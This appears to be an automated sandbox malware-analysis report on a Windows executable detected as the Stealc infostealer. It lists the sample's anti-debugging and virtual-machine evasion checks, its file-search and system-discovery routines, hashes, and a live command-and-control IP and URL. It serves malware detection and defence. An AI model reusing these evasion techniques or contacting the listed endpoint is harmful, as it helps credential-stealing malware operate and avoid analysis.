                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96558 second address: D9655E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96AB8 second address: D96AC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96C0C second address: D96C24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE921Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jno 00007FB97CFE9216h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9871E second address: D98735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFF0162h 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D99F76 second address: D99F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB97CFE921Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D99F84 second address: D99F89 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9CE27 second address: D9CE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB97CFE921Bh 0x0000000d pop edx 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jnc 00007FB97CFE921Ch 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007FB97CFE9223h 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push edi 0x00000024 pushad 0x00000025 push eax 0x00000026 pop eax 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9E3BC second address: D9E3EC instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB97CFF0173h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jng 00007FB97CFF015Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54102EE second address: 54102FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB97CFE921Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54102FF second address: 5410305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410305 second address: 5410309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410309 second address: 5410365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007FB97CFF0164h 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 mov esi, 4EA6FC4Dh 0x00000017 movzx esi, bx 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d jmp 00007FB97CFF0165h 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 call 00007FB97CFF0163h 0x0000002b pop ecx 0x0000002c mov bh, 4Ch 0x0000002e popad 0x0000002f rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CA652F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CD2B74 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CBE5E7 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_008B38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_008B4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008ADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_008ADA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008AE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_008AE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008AED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_008AED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_008B4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008AF68A FindFirstFileA,0_2_008AF68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_008B3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008AF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_008AF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_008A16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008ADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_008ADE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008ABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_008ABE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A1160 GetSystemInfo,ExitProcess,0_2_008A1160
                Source: file.exe, file.exe, 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2086459115.0000000001451000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                Source: file.exe, 00000000.00000002.2086459115.0000000001483000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2086459115.000000000140E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13630
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13685
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13649
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13633
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13645
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A45C0 VirtualProtect ?,00000004,00000100,000000000_2_008A45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_008B9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B9750 mov eax, dword ptr fs:[00000030h]0_2_008B9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_008B78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5064, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_008B9600
                Source: file.exe, file.exe, 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_008B7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_008B7980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_008B7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_008B7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.8a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2044296444.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2086459115.000000000140E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5064, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.8a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2044296444.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2086459115.000000000140E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5064, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phptrue
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.37/e2b1563c6670f193.php6Y3file.exe, 00000000.00000002.2086459115.0000000001469000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.37file.exe, 00000000.00000002.2086459115.000000000140E000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37DWfile.exe, 00000000.00000002.2086459115.000000000140E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.37/e2b1563c6670f193.phpOFfile.exe, 00000000.00000002.2086459115.0000000001469000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.37
                            		unknownPortugal
                            		206894WHOLESALECONNECTIONSNLtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1520803
                            Start date and time:2024-09-27 23:13:10 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 2m 46s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:2
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 81%
                            • Number of executed functions: 20
                            • Number of non-executed functions: 83
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: file.exe

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.37file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                            • 185.215.113.103
                            file.exeGet hashmaliciousAmadeyBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousAmadeyBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousAmadey, BitCoin Miner, SilentXMRMinerBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            kYpONUhAR5.exeGet hashmaliciousRedLineBrowse
                            • 185.215.113.67
                            file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                            • 185.215.113.103

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.948955789166306
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'871'872 bytes
                            MD5:725d70229eb4ef1cb992cafa8a031527
                            SHA1:69af2b2f4a85e3ce78f5b9a9484bb7a3f13ca5ff
                            SHA256:edc9cb8db3fafd7737aeda3122a8a4b967cf4e79887ef38910dcfd6b2e99b635
                            SHA512:82ee65d8dd9a3df36cb0066b006e0325dbea7562a128dada34ce17c9a4ecefcaa946a38d8cb217e72dde846105b4fedb9578efe1ba9aa2c2cdb98a68e9bbc44d
                            SSDEEP:24576:s3YfdVGyDhuNhFw7ZjAspUvOlC/tqo19VX4hL0b+x4jE8FjC2JthFdRKOrZWa:HgyQsYOKh9l4bx4jEOzhFnBZ
                            TLSH:CF8533049D51EAFEDA6CF7FC305608C477E256A192795CBC13AA31B60862F4A3F05E9C
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0xaae000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007FB97C88DF7Ah
                            movd mm3, dword ptr [eax+eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            jmp 00007FB97C88FF75h
                            add byte ptr [edx], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], dl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ebx], cl
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add cl, byte ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            push es
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax+eax*4], cl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add cl, byte ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            and byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            and dword ptr [eax], eax
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [eax+00000000h], eax
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add ecx, dword ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [eax+00000000h], eax
                            add byte ptr [eax], al

                            Rich Headers

                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x25b0000x228007351ae06287288eaaea5ec27b20e263cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
